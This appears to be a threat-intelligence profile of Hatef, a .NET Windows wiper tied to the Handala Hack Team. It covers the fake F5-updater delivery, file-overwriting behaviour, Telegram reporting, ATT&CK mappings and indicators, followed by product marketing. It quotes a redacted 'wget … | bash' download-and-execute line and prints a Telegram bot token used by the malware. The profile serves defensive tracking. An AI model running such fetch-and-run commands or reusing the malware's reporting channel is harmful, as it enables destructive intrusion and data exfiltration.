Hatef
Hatef is a Windows wiper malware family associated with the Handala Hack Team, a pro-Palestinian hacktivist-branded cluster that multiple security firms assess as linked to Iranian state activity, including reporting tying the broader cluster to MOIS and overlap with Void Manticore / Storm-0842 / BANISHED KITTEN / Dune. It is described as a .NET-based wiper for Windows and is repeatedly referenced alongside the Linux wiper Hamsa and other Handala-linked destructive malware including BiBi Wiper, Cl Wiper, CoolWipe, ChillWipe, and Handala Wiper.
High-confidence reporting in the content ties Hatef to phishing-led destructive campaigns, including Operation HamsaUpdate targeting Israeli organizations via F5 BIG-IP vulnerability-themed lures. In that campaign, administrators were instructed to execute a ZIP-delivered Windows loader masquerading as an F5 update utility. The initial loader, a C# executable named F5UPDATER.EXE, extracted an embedded resource named Hatef.exe from the archive and executed it from System32. One documented loader sample had SHA-256 fe07dca68f288a4f6d7cbd34d79bb70bc309635876298d4fde33c25277e30bd2. Another related loader sample, SHA-256 ca9bf13897af109cb354f2629c10803966eb757ee4b2e468abc04e7681d0d74a, contained both Hatef.exe and Handala.exe resources, with Handala.exe acting as a Delphi second-stage loader.
Behaviorally, Hatef performs a singleton check, verifies Administrator privileges, and uses a fake updater message box to prompt elevation. It recursively overwrites files with 4096-byte blocks of random data and then deletes them. Reported target paths include Users, Program Files, Program Files (x86), and Windows across connected drives. The malware reports execution status to a Telegram chat, including the victim external IP address, hostname, timestamp, and counts of undeleted files. The same reporting infrastructure was also used by the paired Linux Hamsa variant; published indicators include Telegram Bot ID 6428401585:AAGE6SbwtVJxOpLjdMcrL45gb18H9UV7tQA and chat/channel ID 6932028002.
The content characterizes Hatef as part of a broader evolution in Iranian disruptive operations toward cross-platform destructive capability. Hatef is specifically identified as the Windows component of a Windows/Linux wiper set, while Hamsa and BiBi are described as Bash-based Linux wipers. Across reporting, Handala is said to deploy Hatef in attacks and to gain initial access through social engineering and phishing, including impersonation of legitimate organizations and exploitation of major security incidents such as the CrowdStrike outage as lure material. Hatef has been publicly linked to campaigns targeting Israeli organizations and is also cited in reporting on Handala activity affecting Western targets, including the Stryker incident context, although some later disruptive operations were assessed as potentially relying on abuse of legitimate management tooling rather than traditional malware deployment.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The group’s wiper malware family includes variants named BiBi Wiper, Hatef, Hamsa (Linux), CoolWipe, and ChillWipe.
Techniques & procedures
13 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquesHandala commonly gains Initial Access through social engineering via phishing using a combination of exploitation of major events and vulnerabilities and impersonation of legitimate organizations to steal and leak data through a dedicated leak site.
The most studied example is a phishing campaign from July 2024 that exploited the global CrowdStrike outage. The group sent emails to Israeli organizations with fake remediation tools. Victims who downloaded the archive got hit with a multi-stage chain that ended in a wiper payload erasing their files.
Victims were directed to download a malicious archive containing a disguised installer that deployed a destructive wiper payload.
Execution
2 techniquesHandala campaigns typically use a staged execution chain designed to evade detection. Payload components are reconstructed at runtime and delivered through scripting frameworks before deploying the final wiper payload.
“the victim is instructed to run a specific file across all their Linux and Windows servers… utilize root privileges to execute a wget command… Windows server administrators are instructed to open and execute an attached archive ZIP file.”
Privilege Escalation
1 technique“Hatef Wiper checks for Administrator privileges… presents a message box… requiring Administrator access to proceed… coax the user into granting elevated permissions.” / “For Linux servers… utilizing root privileges to execute a wget command.”
Stealth
1 technique“F5UPDATER.EXE… disguised as a system update tool of F5.” / “After masquerading as a routine update… ‘The system has been updated successfully!’” / “Naples.pif… renamed AutoIt interpreter… .pif… camouflage…”
Discovery
1 technique“transmits… external IP address… hostname… timestamp…” / “reconnaissance to identify the Linux distribution… Red Hat, Ubuntu, or Debian.”
Command and Control
2 techniques“During its operation, the wiper sends periodic updates to a predetermined Telegram chat…” / “this wiper version transmits data to the same Telegram channel… Bot Id… Channel Id…”
“wget -O - https://…/update.sh | bash” / “Both ZIP files contain… F5UPDATER.EXE… extracts assembly from the resource section. The payload is written to System32 and executed.”
Impact
3 techniquesMITRE ATT&CK TTPs Tactic ID Technique Impact T1485 Data Destruction
Handala combines information gathering and system disruption to paralyze healthcare, education, and infrastructure with BiBi/Hatef wiper
MITRE ATT&CK TTPs Tactic ID Technique Impact T1561.002 Disk Structure Wipe
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A wiper malware variant in Handala’s toolkit used for destructive impact operations.
A .NET-based Windows wiper used in cross-platform destructive campaigns and focused on file-level destruction.
A wiper malware reportedly used by Handala in destructive attacks to wipe Windows and Linux systems.
A .NET-based destructive wiper in Handala's malware arsenal.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.